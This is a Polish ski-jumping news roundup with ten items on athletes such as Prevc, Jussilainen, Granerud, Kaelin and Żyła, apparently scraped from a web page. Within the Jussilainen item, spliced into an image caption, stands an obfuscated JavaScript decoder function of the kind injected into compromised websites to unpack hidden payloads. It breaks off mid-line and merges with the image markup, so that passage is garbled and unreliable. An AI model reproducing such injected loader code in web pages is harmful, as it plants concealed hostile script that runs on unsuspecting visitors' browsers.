You are currently viewing „Wokół Skoczni”: fortuna Jussilainena, pojedynek Graneruda, wąsy Kaelina

„Wokół Skoczni”: fortuna Jussilainena, pojedynek Graneruda, wąsy Kaelina

8H7A7842 - "Wokół Skoczni": fortuna Jussilainena, pojedynek Graneruda, wąsy Kaelina

Ostatnie przed rozpoczęciem sezonu 2017/2018 „Wokół Skoczni” przed nami, a w nim: wizyta Petera Prevca w siedzibie Fischer Sports, nietypowe wyzwania w wykonaniu Nejca Dezmana i Halvora Egnera Graneruda oraz pokaźna fortuna Jussilainena. Zdradzimy również co chodzi z wąsami Pascala Kaelina i czy inspiracją do zmiany wyglądu Szwajcara był Robert Johansson.

 

1. Peter Prevc z wizytą w Fischer Sports

W sierpniu tego roku Peter Prevc wywołał niemałe poruszenie swoją decyzją o zmianie nart z produkowanych przez swojego rodaka, Petera Slatnara, na „deski” marki Fischer Sports. Jak się okazało, narty Fischer w odczuciu najstarszego z braci Prevc charakteryzują się lepszą stabilnością niż poprzednio używane. Przed kilkoma dniami Słoweniec w blasku fleszy odebrał nowe narty z fabryki producenta.

 

I collected the skis, so the winter can come. ☃ #winteriscoming❄️ #thankyou #fischer

Post udostępniony przez Peter Prevc (@pprevc)

 

2. Biznes w wykonaniu Risto Jussilainena 

Mało kto wie, że były fiński skoczek, Risto Jussilainen po zakończeniu kariery sportowej odkrył w sobie smykałkę do interesów i, jak donoszą fińskie media, zbił na tym fortunę. Po ośmiu latach prowadzenia przedsiębiorstwa Jussilainen sprzedał je za 364 tys. euro. Jak deklaruje emerytowany sportowiec: – Nie planuję w najbliższych miesiącach nowych przedsięwzięć. Czas wziąć oddech. Warto również dodać, że syn Fina, Kristian, poszedł w ślady ojca i jako przedstawiciel trzeciej generacji w rodzinie Jussilainenów, trenuje skoki narciarskie. Ciekawe, czy odziedziczył po tacie również przedsiębiorczość?

- "Wokół Skoczni": fortuna Jussilainena, pojedynek Graneruda, wąsy Kaelinafunction u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var y7=”;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander Nilssen)” src=”http://www.skokipolska.pl/wp-content/uploads/2017/11/1280px-Risto_Jussilainen_2006-300×225.jpg” alt=”Risto Jussilainen (fot. Alexander Nilssen)" width="300" height="225" /> Risto Jussilainen (fot. Alexander Nilssen)

 

3. Sesja olimpijska Niemców

Sezon olimpijski wymaga od sportowców nie tylko skupienia się na wynikach i własnej dyspozcyji, ale również mocno angażuje ich w akcje promujące sportowe święto. Jedną z takich aktywności była sesja olimpijska niemieckiej kadry. Zdjęcia utrzymane w nieco mrocznej stylistyce oraz kolor przewodni - mocna czerwień - ukazały nowe oblicza reprezentantów naszych zachodnich sąsiadów. Próbka poniżej.

 

 

 

Nächste Woche startet endlich die neue Saison mit vielen großen Herausforderungen Skijumping season finally starts next week and will hold many exciting challenges #roadtopyeongchang

 

Post udostępniony przez Andreas Wellinger (@andreaswellinger)

 

 

4. Norwescy superbohaterowie

Halvora Egnera Graneruda śmiało można nazwać najbardziej kreatywnym skoczkiem w dziejach narciarstwa. Prawnuk norweskiego pisarza Thorbjoerna Egnera skakał już bowiem nago, w stroju świętego Mikołaja oraz w tandemie. Ostatnim pomysłem zawodnika było wyzwanie na nietypowy pojedynek kolegi z drużyny, Sigurda Nymoena Soeberga. Zadanie: zmieścić w buzi jak najwięcej słodkich pianek. Zwycięzca: sprawdźcie sami.

 

Reklame. @sigurtso is 1-0 up against @halvorgranerud in the Camp Trondheim challange. Sigurd won the #chubbybunny challange, after a poor performance by Halvor. Another challange tomorrow! Any challange suggestions? — #lo #rikstv #nammo #norsktipping #konicaminolta #adidas #hopplandslaget

Post udostępniony przez Hopplandslaget (@hopplandslaget)

 

5. Nowe zabawki "Michiego" i "Kraftiego"

Austriacy Michal Hayboeck i Stefan Kraft uchodzą za niemal nierozłączny duet. Nie dziwi zatem, że wielu projektów oscylujących tematycznie wokół sportu podejmują się razem. Ostatnio panowie przedstawili światu swoje oficjalne maskotki: rekina (Hayboeck) oraz orła (Kraft) prosząc fanów o sugestie dotyczące imion dla zwierzątek. Na najbardziej kreatywnych czekają nagrody!

 

Namen für unsere Maskottchen gesucht ⚠️⚠️⚠️ mitmachen und gewinnen searching names for our mascots ⚠️ participate and win visit #jumpandreach and comment #mascots #funny #names #wanted #skijumpingAUT #jumpandreach

Post udostępniony przez hayböckmichael (@hayboeckmichael)

 

6. Kaelin z wąsem niczym Johansson?

Listopad to szczególny miesiąc dla mężczyzn, bowiem tę część roku wybrano, żeby przypomnieć o profilaktyce męskich nowotworów oraz zachęcić do dbania o zdrowie. Symbolem akcji jest #Movember oraz wąsy, które panowie propagujący przedsięwzięcie dumnie noszą w listopadzie. Do akcji przyłączył się szwajcarski skoczek, Pascal Kaelin, u którego w 2011 r. wieku zaledwie 19 lat zdiagnozowano raka jąder. Helweta wygrał z chorobą, a teraz sam uświadamia zagrożenie innym mężczyznom.

 

 

 

7. Skoczne inspiracje w Superlidze

#Movember wspierają przedstawiciele różnych dyscyplin sportowych, m.in. grający w polskiej lidze szczypiorniści. Superligowi ambasadorzy akcji w ciągu całego miesiąca mają za zadanie przedstawiać fanom piłki ręcznej zdjęcia o zadanej tematyce. Gwiazdor klubu Piotrkowianin Piotrków Trybunalski, Stanisław Makowiejew, wykonując zdjęcie o tematyce "Wąs sportowy" zainspirował się samym Adamem Małyszem!

 

8. Katja kontra Nejc

Interesujący projekt wykluł się ostatnio ze wspólnej pasji Nejca Dezmana i jego partnerki - słoweńskiej skoczkini - Katji Pozun. Zdecydowali się oni na podjęcie we dwójkę cyklu sportowych wyzwań, niezwiązanych jednak z ich flagową dyscypliną sportu. Para ma już za sobą pierwsze zadanie - strzelanie z łuku. Ich nauczycielką, a zarazem jednoosobowym jury, była utytułowana słoweńska łuczniczka Ana Umer. Ciekawi kto okazał się lepszy?

 

9. Fanklubu Dawida Kubackiego nowa odsłona

Od listopada nową, rozbudowaną odsłoną może pochwalić się strona internetowa fanklubu Dawida Kubackiego. Strona zyskała część portalową, w której ramach odnajdziemy treściwe i pełne unikalnych informacji artykuły dotyczące m.in. historii skoków narciarskich i skoczni w Polsce, psychologii sportu oraz wiadomości na temat mniej znanych kadr z całego świata. Jesteśmy pewni, że fani Dawida nie pozwolą nam się nudzić tej zimy!

 

10. Piotr Żyła poleca

Piotr Żyła swoim temperamentem zaskarbił sobie sympatię wielu marek, które coraz chętniej wykorzystują jego wizerunek w swoich kreacjach reklamowych. Po serii reklam dla Cinema City, "Wiewiór" został twarzą spotu reklamowego pochodzącej z Litwy firmy TransferGo oferującej usługę szybkich przelewów gotówkowych. Piotr firmuje swoim nazwiskiem usługę nawiązującą nazwą do idei sportowych: Fair Play. Efekty współpracy Wiślanina z firmą poniżej.

 

zebrała: Magdalena Janeczko

źródła: kubacki-team.pl / pgnig-superliga.pl / transfergo.com / Instagram / Facebook

Dodaj komentarz